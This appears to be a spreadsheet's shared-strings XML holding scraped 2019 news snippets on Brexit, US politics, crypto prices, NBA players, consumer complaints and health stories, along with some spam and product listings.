unjustifiably restricted their free-speech and due-process rights. They argued that the system was plagued by a patchwork of ambiguous policies and vague standards that put too much discretionary power in the hands of reviewing officials. Source link</t>
  </si>
  <si>
    <t>The Kremlin has played down US media reports of a CIA spy inside Russia's presidential administration, calling them "pulp fiction", but says a low-level official who Russian media suggested was the agent had worked there before being fired.</t>
  </si>
  <si>
    <t>Bitcoin Cash – ABC – Holds onto $300 Bitcoin Cash ABC rose by 4.57% on Saturday. Reversing a 1.75% fall from Friday, Bitcoin Cash ABC ended the day at $301.5. A bearish start to the day saw Bitcoin Cash ABC fall to a late morning intraday low $286.33 before making a move. Holding well above the first major support level at $277.7, Bitcoin Cash ABC rallied to a late intraday high $305.11. Bitcoin Cash ABC broke through the first major resistance level at $299.76 and closed out the day at $300 levels for the first time since 27th August. At the time of writing, Bitcoin Cash ABC was up by 0.3% to $302.39. A mixed start to the day saw Bitcoin Cash ABC rise to an early morning high $303.41 before easing back to $302 levels. Bitcoin Cash ABC left the major support and resistance levels untested early on. For the day ahead, a move through to $304 levels would support a run at the first major resistance level at $308.96 Bitcoin Cash ABC would need the support of the broader market, however, to break out from Saturday’s high $305.11. Barring a broad-based crypto rally, Bitcoin Cash ABC would likely struggle to break through to $310 levels. Failure to move through to $304 levels could see Bitcoin Cash ABC hit reverse. A fall through to $297.7 levels would bring the first major support level at $290.18 into play. Barring a broad-based crypto sell-off, Bitcoin Cash ABC should steer clear of sub-$290 support levels on the day. Litecoin Struggles at $70 Litecoin rallied by 6.1% on Saturday. Reversing a 0.43% fall from Friday, Litecoin ended the day at $68.87. A relatively range-bound start to the day saw Litecoin ease to an early morning intraday low $64.64 before finding support. Steering well clear of the first major support level at $63.15, Litecoin struck an early afternoon intraday high $70.58. Litecoin broke through the first major resistance level at $67.52 and second major resistance level at $70.07. A pullback through the late part of the day left Litecoin at sub-$70 for a 4th consecutive day. At the time of writing, Litecoin was up by 0.28% to $69.06. A bullish start to the day saw Litecoin rise to an early morning high $70 before pulling back to a morning low $68.74. Litecoin left the major support and resistance levels untested early on. For the day ahead, a move back through to $70 levels would support a run at the first major resistance level at $71.42. Litecoin would need support from the broader market, however, to break out from Saturday’s high $70.58. Barring a broad-based crypto rally, Saturday’s high and resistance at $70 would likely limit any upside on the day. Failure to move back through to $70 levels could see Litecoin slide back into the red. A fall through to $67 levels would bring the first major support level at $65.48 into play before any recovery. Barring an extended crypto reversal, Litecoin should steer clear of sub-$65 levels on the day. Ripple’s XRP Holds onto $0.26 Ripple’s XRP gained 3.76% on Saturday. Reversing a 1.85% fall from Friday, Ripple’s XRP ended the day at $0.26087. Range-bound through most of the morning, Ripple’s XRP recovered from a start of a day intraday low $0.25054 to hit a late morning high $0.25366. Ripple’s XRP left the major support and resistance levels untested ahead of a broad-based crypto rally. Finding support from the broader market, Ripple’s XRP struck a late afternoon intraday high $0.26403 before easing back. Ripple’s XRP broke through the first major resistance level at $0.2584 and held onto $0.26 levels through the rest of the day. At the time of writing, Ripple’s XRP was up by 0.15% to $0.26127. A mixed start to the day saw Ripple’s XRP rise from an early morning low $0.26061 to a high $0.26195 before easing back. Ripple’s XRP left the major support and resistance levels untested early on. For the day ahead, a hold onto $0.26 levels would support a run at the first major resistance level at $0.2664. Ripple’s XRP would need support from the broader market, however, to break through Saturday’s high $0.26403. Barring a crypto breakout, Saturday’s high and first major resistance level would likely continue to pin Ripple’s XRP back from $0.27 levels. Failure to hold onto $0.26 levels could see Ripple’s XRP hit reverse. A fall through to $0.2585 levels would bring the first major support level at $0.2529 into play. In the event of an early sell-off, Ripple’s XRP could visit sub-$0.25 levels before any recovery. We would expect Ripple’s XRP to steer clear of the second major support level at $0.2450, however. Please let us know what you think in the comments below Thanks, Bob</t>
  </si>
  <si>
    <t>Photo by Christian Petersen/Getty Images That escalated quickly… This might be one of the shortest articles I have written for this fine Pittsburgh Steelers establishment. After the Steelers traded Antonio Brown to the Oakland Raiders for a third and fifth round draft picks, nothing but drama followed. Brown showed up to training camp in a hot air balloon Started camp on the Physically Unable to Perform List Got Frostbite from a cryogenic chamber Filed a grievance with the league over helmet issues Was fined by the team for missing walk-throughs and practices Threatened to punch GM Mike Mayock Apologized Recorded a private conversation with head coach Jon Gruden and put it on YouTube Was fined again by the Raiders Said he wanted his release Got his release In one of the craziest stories of all-time in the National Football League, the Raiders have released Antonio Brown. Raiders released Antonio Brown. — Adam Schefter (@AdamSchefter) September 7, 2019 This story is just getting started…somehow.</t>
  </si>
  <si>
    <t>The Pentagon says it will pull funding from 127 defence projects, including schools and childcare centres for military families, as it diverts $5.3 billion to fund President Donald Trump's wall along the US border with Mexico.</t>
  </si>
  <si>
    <t>My Kinks: I like everything extraordinary. Come and I wanna Webcam profile: Who`s up for some love party? Come and watch! Favourite sex position: What I do in my amateur show: What I don’t like: Gallery</t>
  </si>
  <si>
    <t>Simon Little</t>
  </si>
  <si>
    <t>British Columbia's third-largest city has become the latest municipality to declare a climate emergency.</t>
  </si>
  <si>
    <t>The US president hails India’s prime minister as “exceptional”, firing up a 50,000-strong crowd. The post ‘Howdy, Modi!’: Trump hails Indian PM at ‘historic’ Texas rally appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Cahal Milmo</t>
  </si>
  <si>
    <t>Further research is needed to establish whether there is a direct link between taking paracetamol during pregnancy and problems in children such as hyperactivity, a study has found. Scientists who examined the histories of 19,000 children born in Bristol said they have found an “association” between intake of paracetamol by pregnant mothers and subsequent behavioural issues in their children such as attention problems and hyperactivity. The study found that 43 per cent of mothers had taken the painkiller between the fourth and seventh months of pregnancy. Comparison with the results of later tests on children’s memory and development, and temperament measures suggested there may be a relationship between difficult behaviours in early years and paracetamol intake during pregnancy, the authors said. Boys seemed to be more susceptible to these “possible behavioural effects” of the drug. ADHD The study by researchers at Bristol University Medical School, published in the journal Paediatric and Perinatal Epidemiology, is the latest in a number of similar population studies claiming to have found associations between behavioural problems and paracetamol intake. One study based on Danish data claimed an increased risk of Attention Deficit Hyperactivity Disorder (ADHD) in seven-year-olds whose mothers had taken paracetamol during pregnancy. Researchers are looking at the use of Paracetamol during pregnancy (Photo: Scott Barbour/Getty Images) The Bristol research found that the behavioural issues observed in children appeared to have disappeared by the end of primary school. It also acknowledged that it had not shown a direct “causal” link between the behavioural issues and the use of paracetamol during pregnancy. ‘No causal link’ Professor Jean Golding, who led the study, said: “Our findings add to a series of results concerning evidence of the possible adverse effects of taking paracetamol during pregnancy. Read more: Expectant mothers get just five hours of sleep a night during pregnancy, says study “It is important that our findings are tested in other studies – we were not in a position to show a causal link, rather an association between two outcomes. “It would also be useful now to assess whether older children and adults are free of difficult behavioural problems if their mother had taken paracetamol.” Current NHS guidance states that paracetamol is used routinely by mothers during all stages of pregnancy but advice should be sought from a GP or midwife before taking any medication. It adds: “There’s no clear evidence [paracetamol] has any harmful effects on an unborn baby.” More Health Man's eyesight restored by stem cells 25 years after acid attack UK criticised for approach on flavoured vaping 'I'm autistic, but I'm not an inspiration — I still struggle' 'I started working in the NHS when it was created in 1948' Toddler needs more physio to live longer but can't get it on NHS Family of teenager who died eating burger want allergy laws changed The post Research needed into ‘link’ between childhood behavioural problems and paracetamol use in pregnancy appeared first on inews.co.uk. The post Research needed into ‘link’ between childhood behavioural problems and paracetamol use in pregnancy appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>THIS afternoon, the pound slumped against the euro with the pair currently trading at around €1.114. Daily Express :: Finance Feed</t>
  </si>
  <si>
    <t>I am 85 years old and live in a small, entirely electric house I bought in September 2012. A mains gas supply goes through a meter affixed to the outside of the house, but is capped off. There is no internal pipework. For several years, I received letters from British Gas addressed to ‘The Business Owner’. I assumed they were not for me and sent them back. I wrote to British Gas on May 7 denying any use of gas or any business connection, but received no reply. The firm is now demanding a substantial sum — most recently £2,534.77. On July 11, I got a final notice, which stated it had added a late-payment fee and that, in the absence of a response, it would visit ‘to start the process of disconnection’. What should I do? A. R., Kent. Tony Hazell replies: Writing to me was a good choice. Much as I relished the idea of an engineer trying to disconnect a non-existent supply, I contacted British Gas, which moved swiftly to resolve the problem. It seems your property was registered as a business address by British Gas in 2007, several years before you moved in. Initially, there was no charge, but then it began to apply standing charges for supply to business and residential customers. These have been accumulating despite no gas being used. British Gas has now cleared all the charges. It has also agreed to remove the meter free of charge — something you tell me you will be very happy to see happen. I accidentally questioned my savings interest… and can’t now get it back Recently, I queried some payments into my Barclays current account that I did not recognise. The bank removed the money — £181 in total. However, I then realised they were the income payments from my National Savings &amp; Investments (NS&amp;I) certificates. I have been trying to get the money back, but each organisation blames the other for the delays. I am beginning to give up hope of ever seeing it again. Mrs T. N., Powys. Contact Ask Tony Write to Tony Hazell at Ask Tony, Money Mail, Northcliffe House, 2 Derry Street, London W8 5TT or email asktony@dailymail.co.uk — please include your daytime phone number, postal address and a separate note addressed to the offending organisation giving them permission to talk to Tony Hazell. We regret we cannot reply to individual letters. Please do not send original documents as we cannot take responsibility for them. No legal responsibility can be accepted by the Daily Mail for answers given. Tony Hazell replies: This was a simple enough issue, yet you have been batted around like a tennis ball. Why? Laziness of employees or an unwillingness to take responsibility? So it was time to bash heads together. But I’m sorry to say the Tweedledum and Tweedledee approach continued. Barclays says NS&amp;I should have told it which account needed to be credited. Yah boo — it’s NS&amp;I’s fault! NS&amp;I says that when money is returned, it does not make any further payments from that customer’s account until it has been in contact with them. This helps to prevent fraud, or money going astray. It suggested the money would be found in a Barclays suspense account, as NS&amp;I would only recall a payment if it had been sent to an incorrect bank account. So it’s Barclays’ fault! No matter. Barclays has now found the money and added £25 to it. And NS&amp;I has arranged for a £75 goodwill payment. As you say, this all started as a result of a silly mistake by you — but the silliness of each bank has put yours in the shade. Santander bungled our power of attorney… and then the complaint After my father died, my mother chose to give me and my two sisters power of attorney. We signed the documents in separate branches of Santander, but, when the confirmation arrived, my name was missing. I spoke to Santander and it took my details and a copy of my passport, which it seems to have lost. I was told the complaints department would contact me, but it didn’t. I have since received a letter stating I need to provide copies of all the documentation again, but these are with my mother. Meanwhile, my mother has received a letter from the head of complaints, stamped ‘resolved’. Clearly, it is not. It was suggested that I try to register online. Despite repeated attempts, I could not do so. R. R., London. Banks all too frequently adopt a slapdash approach to those registering and operating a power of attorney (POA). Poorly trained staff can expect customers to jump through hoops. Few banks seem to have proper procedures in place, and, where they do, staff appear oblivious. The number of us handling a POA on behalf of relatives will inevitably grow, yet banks behave as if we have nothing better to do than mop up their errors. I have considerable personal experience of these frustrations, so can fully understand what you are going through. The part of your letter I have published is only a glimpse of the many attempts you and your mother have made to resolve this, while Santander has shown breathtaking incompetence. Santander says you visited its Walthamstow branch on April 12. On May 1, the Liverpool branch confirmed the documents were not sufficiently completed to register you. Why not? Were the Walthamstow staff not properly trained in how to deal with this? On June 6, you called to query why confirmation hadn’t come through to you. Why did you have to initiate contact? Surely the bank should have called you when it found something wrong? By July 3, your complaints had elicited a second written response, plus £25 to pay for a registration with anti-fraud agency, Cifas, as you were worried your documents had been lost by the bank. Santander has now paid you £200 compensation in addition to the £25 and another £75 paid earlier. And it has confirmed the POA has now been registered. Straight to the point I switched to a new tariff with Together Energy in January and was £362 in credit. I was told I’d receive a refund, but, despite chasing, I’ve never had my money back. J. R., Leeds. Together Energy says refunds are issued automatically only if you are leaving the provider. It says it has a record of your request for a refund and admits that, in error, this was not acted upon. After a meter reading, your credit dropped to £292.30. The firm has apologised and given back your money, plus £25 as a goodwill gesture. I disagree with the maintenance fees my leasehold managing agent is trying to charge me. Can I complain to anyone? N. O., Manchester. Complain to your managing agent and follow their procedure. If you are not happy with their response, or they have not replied within eight weeks, contact the Property Ombudsman. Call 01722 333306 or download its complaint forms online at tpos.co.uk/ consumers/completing-the-complaints-form While checking my bank statements, I noticed I’m paying Amazon £7.99 a month. I rang, but was told I don’t have an account. So why is it still taking my cash? K. J., Cromer, Norfolk. You do have an Amazon account and, in January 2018, you inadvertently signed up for Amazon Prime membership at £7.99 a month. Amazon didn’t know this when you called, as you gave your husband’s details. Since you have never used Prime, Amazon has cancelled it and issued a full refund. I took my car to Finland and suffered a stroke while there. My RAC breakdown policy covered repatriating the vehicle, but I was told this would take six weeks. So, when safe, I insisted on driving it back. The RAC said it would pay me £2,000, but I thought I’d be able to claim more on top, for expenses such as new flights. B. P., Lancashire. The RAC says the £2,000 it offered was to cover expenses and expected you to provide receipts. Some of the things for which you wanted to claim simply weren’t reasonable, such as a husky dog ride. It has now kindly offered to reimburse you up to £2,355 to cover your diesel, ferry and air fares, as long as you send it the receipts. #fiveDealsWidget .dealItemTitle#mobile {display:none} #fiveDealsWidget {display:block; float:left; clear:both; max-width:636px; margin:0; padding:0; line-height:120%; font-size:12px} #fiveDealsWidget div, #fiveDealsWidget a {margin:0; padding:0; line-height:120%; text-decoration: none; font-family:Arial, Helvetica ,sans-serif} #fiveDealsWidget .widgetTitleBox {display:block; float:left; width:100%; background-color:#B11B16; } #fiveDealsWidget .widgetTitle {color:#fff; text-transform: uppercase; font-size:18px; font-weight:bold; margin:6px 10px 4px 10px; } #fiveDealsWidget a.dealItem {float:left; display:block; width:124px; margin-right:4px; margin-top:5px; background-color: #e3e3e3; min-height:200px;} #fiveDealsWidget a.dealItem#last {margin-right:0} #fiveDealsWidget .dealItemTitle {display:block; margin:10px 5px; color:#000; font-weight:bold} #fiveDealsWidget .dealItemImage, #fiveDealsWidget .dealItemImage img {float:left; display:block; margin:0; padding:0} #fiveDealsWidget .dealItemImage {border:1px solid #ccc} #fiveDealsWidget .dealItemImage img {width:100%; height:auto} #fiveDealsWidget .dealItemdesc {float:left; display:block; color:#e22953; font-weight:bold; margin:5px;} #fiveDealsWidget .dealItemRate {float:left; display:block; color:#000; margin:5px} #fiveDealsWidget .dealFooter {display:block; float:left; width:100%; margin-top:5px; background-color:#e3e3e3 } #fiveDealsWidget .footerText {font-size:10px; margin:10px 10px 10px 10px;} @media (max-width: 635px) { #fiveDealsWidget a.dealItem {width:19%; margin-right:1%} #fiveDealsWidget a.dealItem#last {width:20%} } @media (max-width: 560px) { #fiveDealsWidget #desktop {display:none} #fiveDealsWidget .widgetTitleBox {background-color:#e3e3e3; } #fiveDealsWidget .widgetTitle {color:#000} #fiveDealsWidget #mobile {display:block!important} #fiveDealsWidget a.dealItem {background-color: #fff; height:auto; min-height:auto} #fiveDealsWidget a.dealItem {border-bottom:1px solid #ececec; margin-bottom:5px; padding-bottom:10px} #fiveDealsWidget a.dealItem#last {border-bottom:0px solid #ececec; margin-bottom:5px; padding-bottom:0px} #fiveDealsWidget a.dealItem, #fiveDealsWidget a.dealItem#last {width:100%} #fiveDealsWidget .dealItemContent, #fiveDealsWidget .dealItemImage {float:left; display:inline-block} #fiveDealsWidget .dealItemImage {width:35%; margin-right:1%} #fiveDealsWidget .dealItemContent {width:63%} #fiveDealsWidget .dealItemTitle {margin: 0px 5px 5px; font-size:16px} #fiveDealsWidget .dealItemContent .dealItemdesc, #fiveDealsWidget .dealItemContent .dealItemRate {clear:both} }</t>
  </si>
  <si>
    <t>Donald Trump told reporters he discussed "corruption" and "Joe Biden and his son" during a phone call with Ukraine's leader.</t>
  </si>
  <si>
    <t>Barcelona have been fined a miniscule amount by the Spanish soccer federation after being breaking rules in the pursuit of Antoine Griezmann.</t>
  </si>
  <si>
    <t>German Spanish Hangman game – select either to guess the German or the Spanish word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading German Spanish Hangman →</t>
  </si>
  <si>
    <t>Former NBA guard Jared Cunningham to work out for Houston this week Original Source Former first-round pick Jared Cunningham will reportedly work out for the Houston Rockets this week, according to ESPN’s Marc J. Spears. Cunningham, 28, last appeared in the NBA with the Milwaukee Bucks, appearing in four games during the 2015-16 season after signing a 10-day contract before turning into a free agent. The 6-foot-4 shooting guard was selected with the 24th overall pick in the 2012 draft by the Cleveland Cavaliers out of Oregon State before being traded to the Dallas Mavericks on draft night. Cunningham only competed in eight contests for the Mavs, however, being a frequent player for the G League affiliate Texas Legends before finding himself traded in June 2013 to the Atlanta Hawks. Cunningham cemented his NBA journeyman status when he would play for four franchises in the span of three seasons. He was waived by the Hawks, then signed a 10-day deal with the Sacramento Kings, then signed with the Los Angeles Clippers before being traded to and waived by the Philadelphia 76ers. Cunningham was a part of the three-team Cleveland Cavaliers deal that brought Channing Frye to the eventual 2016 champs, where the former Beavers product was waived by the Orlando Magic. Cunningham saw his last opportunity thereafter signing with the Bucks. Since then, Cunningham has played overseas in China, Germany, and most recently in Italy. He competed in 2018-19 with Basket Brescia Leonessa. Cunningham posted 13.8 points, 3.0 rebounds, and 2.1 assists per game in 18 league appearances for Brescia Leonessa, shooting 37.8% from the floor, 29.9% from 3-point range, and 75.5% from the free throw line. Shaq’s Savage Reaction To Dwight Howard Joining Lakers | CP NBA Pod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‘819338648198169’); fbq(‘track’, “PageView”); fbq(‘track’, ‘ViewContent’);(function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v2.4”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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Former NBA guard Jared Cunningham to work out for Houston this week appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>HOW TO live longer: A long and fulfilling life is largely dependent on the foods people eat. Extensive evidence suggests a certain popular diet may offer the best defence against life-threatening complications, extend life longevity in the process. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Rock legend Sir Elton John features on a new set of Royal Mail stamps to celebrate his contribution to music. Read more? Click here</t>
  </si>
  <si>
    <t>Former NBA Player Andre Emmett Found Dead In Dallas – CBS Dallas / Fort Worth Original Source DALLAS, Texas (CBSDFW.COM) – Former NBA player Andre Emmett, who played two seasons with the Nets and Grizzlies, was killed Monday morning in Dallas, his family confirmed. Emmett’s body was found by a passerby at 2:30 a.m. on the side of the street at 1800 N Prairie Avenue, near Munger Avenue. Dallas Fire Rescue arrived and observed Emmett had a gunshot wound. They transported the 37-year-old to a local hospital where he died. The BIG3 is in a state of shock over the sudden and tragic death of Andre Emmett. Andre was a member of the BIG3 family for two seasons and never without a smile on his face. His kindness towards others and easy-going demeanor made him a joy to be around. pic.twitter.com/QoNJ7NH2k0 — BIG3 on CBS (@thebig3) September 23, 2019 Emmett was a father. He played at Texas Tech and was No. 36 pick in 2004 draft. The investigation ongoing and there are no suspects in custody.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Former NBA Player Andre Emmett Found Dead In Dallas – CBS Dallas / Fort Worth appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Essendon officials were asked to guarantee Joe Daniher's future at the club. They couldn't.</t>
  </si>
  <si>
    <t>in a stinging rebuke, the UK Supreme Court has ruled that the trumpian buffoon currently occupying the position of UK Prime Minister lied to the queen, and his decision to shut down parliament was a calculated dishonest, deceitful, unlawful act – http://tinyurl.com/y36hksut</t>
  </si>
  <si>
    <t>The Reserve Bank of Australia has confirmed that the nation’s interest rates will remain unchanged at 1 per cent. That number could drop even further, according to CommSec Senior Economist Ryan Felsman. “Our expectation is that we’ll see interest rates at 0.5 per cent by February next year,” the economist told Sky News, adding that “the stimulus together with infrastructure spending is likely to boost the economy in the second half of this year”.</t>
  </si>
  <si>
    <t>What can your skin and hair tell you about your health? Enter: functional medicine. Original Source Getty Images When it comes to health, it’s not uncommon for folks to talk about their latest workout obsession or their success with intermittent fasting. But when was the last time you heard someone talk about their nails or hair as it pertained to their health? Enter functional medicine. Previously considered to be “alternative,” functional medicine addresses root causes rather than just symptoms. With functional medicine, it is not a “one pill to fit them all” mentality. One condition may have many causes, and it is the job of a functional medicine professional to investigate and find each cause to properly treat the individual patient. Photo courtesy of Alayna Waggoner Dr. Ruben Valdes (from left), Dr. Ryan Valencic and Dr. Logan Evans Novis Health is a functional medicine practice located in Fort Mill and focuses on the treatment of type II diabetes and hypothyroidism, among other conditions. We caught up with Dr. Ryan Valencic, co-leader of the practice with Dr. Ruben Valdes, to find out what functional medicine is all about. CharlotteFive: How would you describe what functional health is to a person who is not familiar with the term? Dr. Valencic: Functional medicine is focused on a biology-based approach that identifies and addresses the root cause of a disease. Each symptom or cause depends on the individual’s genes, environment and lifestyle. Functional medicine doctors assess why chronic health issues are present and then build a personalized treatment plan. That may include diet and lifestyle, but will also most definitely include what can be done to affect overall health. C5: What can someone expect from a functional health screening/assessment? Dr. Valencic: We (at Novis Health) test extensively, more so than a “traditional” doctor’s office. Often, by the time people get to us, they might feel like they’re crazy because every health professional has been telling them based on the testing they’ve done that the patient is fine. We go beyond standard panels to reveal why their symptoms are real and why it’s happening. Once completed, the results are thoroughly analyzed and dietary, lifestyle and nutraceutical protocols are customized for that individual. C5: Who could benefit from functional health services? Valencic: Anyone can benefit from these services, but they are most commonly utilized for individuals suffering from chronic diseases such as diabetes, hypothyroidism and autoimmune diseases to name a few. We see a lot of people with the symptoms of low thyroid, who are being treated with prescription medicine and are seeing no marked change. If you’re wondering if you have a thyroid issue, symptoms of hypothyroidism include: Inability to lose weight despite your healthy diet and exercise Depression Fatigue Anxiety Hair loss C5: Do insurance companies recognize the services there? Valencic: Many of our patients receive reimbursement for some of the services we provide. C5: What do you have to say to people who say functional medicine and practices are fake news? Valencic: I would put them in the same boat as those who defiantly stated that the earth was flat hundreds of years ago. Having an opinion without properly understanding something rarely makes you right. Interested in learning more about functional medicine, especially as it pertains to your thyroid? Dr. Valencic and Dr. Valdes recently published the book “The Thyroid Hack: The Secrets, Solutions And Shortcuts To Feeling Like Yourself Again.” It’s available directly through the Novis office and is a comprehensive guide to understand thyroid dysfunction, how to prevent it and how to manage it naturally. “If you don’t feel like you’ve been accurately or fully diagnosed, or if you feel you haven’t been given appropriate treatment, you’re probably right.”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What can your skin and hair tell you about your health? Enter: functional medicine. appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Coinbase is announcing a new initiative called the USDC Bootstrap Fund. As the name suggests, the company wants to support developers with a fund composed of USDC tokens. DeFi, or Decentralized Finance, is a recent trend in the blockchain space. DeFi projects are traditional financial products that you’d expect from a traditional bank, such as lending protocols and derivatives, built on top of a blockchain. Thanks to the decentralized nature of these protocols, it’s harder to censor them and more people should theoretically be able to access those services. Going back to Coinbase, the company thinks there’s not enough liquidity for some DeFi protocols. The startup wants to improve that by investing USDC directly in DeFi protocols. Those investments are smart contracts, and returns should be provided by a counterparty, such as a borrower or taker. In other words, it’ll become much easier to borrow USDC using some DeFi protocols as Coinbase is providing a pool of USDC tokens. Counterparties will have to provide crypto collateral and pay some interest rate. Coinbase is also announcing its first two investments through the USDC Bootstrap Fund. The company is handing 1 million in USDC to Compound, and 1 million in USDC to dYdX.</t>
  </si>
  <si>
    <t>The White Sox have a chance to let Dave Dombrowski and Tony La Russa finish their careers back where they got started. Jerry Reinsdorf should be doing everything he can to add the decorated duo, Source: Sports Business News</t>
  </si>
  <si>
    <t>Danish Swahili Dictionary – travel dictionary to translate Danish to Swahili. Click on the list to show Danish or Swahili synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Danish Swahili Dictionary →</t>
  </si>
  <si>
    <t>Best Cosmetic Dentists in Kleinburg, Vaughan, ON – Napa Valley Dental Centre, Green Apple Implant &amp; General Dentistry, Woodbridge Vaughan Dental, Sabharwal Dental Group, Sunrise Dental Yelp Find Near Cancel. The Best 10 Dentists near Woodbridge, Vaughan, ON Showing 1-10 of 35 Vaughan Woodbridge Health &amp; Medical Dentists. Dr. Jacqueline Ha is Cosmetic Laser Implant Dentist providing excellent orthodontic services to all ages. Her office is. Preferred Dentist In Vaughan Ontario She grew up in Ontario, Canada, and studied neuroscience at. and she became an Invisalign Preferred Provider. She is one. Marble Dental Clinic, provides leading dental services in Woodbridge/Kleinburg/Vaughan, Ontario. Dr. Elnaz Safarinia (Family and cosmetic dentist ) is one of the best dentists in Vaughan/ woodbridge in Ontario. She helps her patients feel. Proposed Cosmetic Dentists top services with user reviews and recommandations near Vaughan (ON). What Where Register Log in Cosmetic Dentists near Vaughan, ON Fyple Ontario Vaughan Health &amp; Beauty Dentists Cosmetic Dentists Add your business for free. Locate and compare Cosmetic Dentist in Maple Vaughan ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Best Cosmetic Dentists in Woodbridge, Vaughan, ON – Woodbridge Vaughan Dental, Innovation Drive Dental, Woodbridge Dental Arts, Today's Family Dental Centre, Dental Specialists Group, Aberdeen Dentistry, Chiarot John, DDS, Sunny Day Dental, . Number 1 Dental Clinic In Vaughan hours of operation, the address and the phone number of the local Dentist you are looking for. The Children`s Dental Home – Dr. Barry Rubinoff, Dr. Matt Grinstein and Dr. Cliff Simon Orthodontist Dentist in Vaughan 1 Promenade (905) 882-9888. . Locate and compare Dentists in Vaughan ON, Yellow Pages Local Listings. Find useful information, Cosmetic Dentist In Vaughan Ontario See more of Woodbridge Smile Centre on Facebook Log In or Create New Account See more of Woodbridge Smile Centre on Facebook Log In Forgot account? or Create New Account Not Now Woodbridge Smile Centre Cosmetic Dentist in Vaughan, Ontario 5. . Locate and compare Cosmetic Dentistry in Vaughan ON, Yellow Pages Local Listings. Find Cosmetic Dentistry Near Vaughan, Ontario If you live in the Vaughan area and are looking for a skilled cosmetic dentist who can help you improve both the health and appearance of your teeth and gums, Dr. Susie Ang offers a number of advanced.</t>
  </si>
  <si>
    <t>Express Sport rates the Laver Cup players after Team Europe beat Team World 13-11. Daily Express :: Sport Feed</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</si>
  <si>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Homebuilt plane crashes in California, killing 2 by USA Consumer Credit Counseling, Felipe Escobar on Thursday 05 September 2019 11:33 AM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Homebuilt plane crashes in California, killing 2 Thursday 05 September 2019 11:11 AM UTC-05 | Tags: consumer-credit-counseling-service http://creditcounselingconsumer.home.blog/napa-california-consumer-credit-counseling-service-888-551-1270/ FAA and the National Transportation Safety Board are investigating the cause of the crash from Homebuilt plane crashes in California, killing 2 via Homebuilt plane crashes in California, killing 2 March 31, 2018 at 10:39PM Tags: Arlington Heights, Illinois Consumer Credit Counseling Service | (888) 551-1270 via Homebuilt plane crashes in California, killing 2 September 05, 2019 at 11:01AM Copyright © September 05, 2019 at 11:01AM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>The high street tycoon Mike Ashley is continuing his unprecedented acquisition spree by tabling a bid to acquire Links of London, the struggling jewellery chain. Read more? Click here</t>
  </si>
  <si>
    <t>ANN WIDDECOMBE has savaged both the government and the Labour Party for failing to worsening the Brexit crisis instead of “implementing the will of the British people”. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>Jenny Noyes</t>
  </si>
  <si>
    <t>Police are still unsure if the death of the Central Coast woman was suspicious, and are asking anyone with information to come forward.</t>
  </si>
  <si>
    <t>With Catherine Full Body, Atlus teams have introduced a whole new character to the game and upset the whole story as we know it. In addition to dealing with his problems with Katherine and Catherine, our friend Vincent will also have to take care of "Rin", a mysterious amnesiac character whom he met at the beginning of Catherine Full Body and who will then be engaged in the Stray Sheep bar, a place where Vincent meets his long-time friends every night. A new character also means new purposes to unlock. Before accessing the different purposes of Rin, you will first have to open the way to "A new future" and thus access Rin's road, thus ruling out the possibility of ending with Katherine or Catherine as was the case in the original game. For that, you will have to answer correctly some questions asked in the confessional of the cathedral during the various stages of the nightmares of Vincent. How to open the way to "A new future" with Rin in Catherine Full Body? Be careful when you are in the confessional nightmares of Catherine Full Body. The narrator's voice will always tell you that the following question opens the way to "A new future". When he announces this, he is talking about the relationship between Rin and Vincent. You will know that you have responded well when you see the balance between good and bad breaking after your answer. To help you get the ends with Rin, we've listed you following the important questions and answers. To the question – Will you appreciate your partner giving you all his secrets? → Answer – Yes. To the question – Are you worried about others? → Answer – It does not stop me from sleeping. To the question – Would you accept any secret from your lover? → Answer – Everything would fit me. To the question – What factors influence you the most when you make an important decision? → Answer – My heart. From there, you opened a possible path to another future for Vincent. But some answers will still determine Vincent's feelings towards Rin. These final questions will be asked one night at the bar while Vincent uncovered the true identity of Rin. You can then continue on this path or change your mind by discovering who Rin really is … To continue on this future, answer the following questions with these answers. To the question – What does Rin represent to me? → Answer – Someone I need. To the question – Maybe I too want to live like this. Without anyone to judge me? → Answer – I do not know yet. To the question – But to be really myself, will I have to …? → Answer – A future with Rin. From there, you have paved the way for a future with Rin. You will then need to correctly answer some of the questions asked during Vincent's 9 and 10 nightmares to get the true end. We will soon publish a guide to get all the tips from Catherine, Katherine and Rin. .</t>
  </si>
  <si>
    <t>David Cameron has torn into Boris Johnson saying he “didn’t believe in” Brexit — and backed it to boost his career.</t>
  </si>
  <si>
    <t>From backstop to Brexiteer, Britain's decision to leave the European Union has spawned a baffling array of new terms, while British parliamentary terminology is also confusing an audience across the world.</t>
  </si>
  <si>
    <t>You are viewing the GEBD71-2 MiniStrip LED DS 7100K Module – Tetra 93035278 from the GE Tetra Range. The miniStrip DS modules are designed for double signed signs with a 6 to 12 inch can depth. MiniStrip modules are seen as the replacement to the T8 fluorescent tubes to deliver outstanding visual performances and for money saving advantages. Using the OptiLens technology from GE which maximises LED performance by capturing wasted light and redirecting towards the illuminated surface. IP68 rated for use in exposed applications and even wet weather outdoor applications. Easy installation with pre drilled mounting holes and the ability to cut between any modules to give customers extra peace of mind and free reign with the products. Comes complete with a 5 year warranty. 32 modules per sleeve. Manufacturers Part No (where applicable) : GEBD71-2 This GE Tetra product is available for just £6.36 at LampShopOnline Ltd</t>
  </si>
  <si>
    <t>Charlotte Grieve</t>
  </si>
  <si>
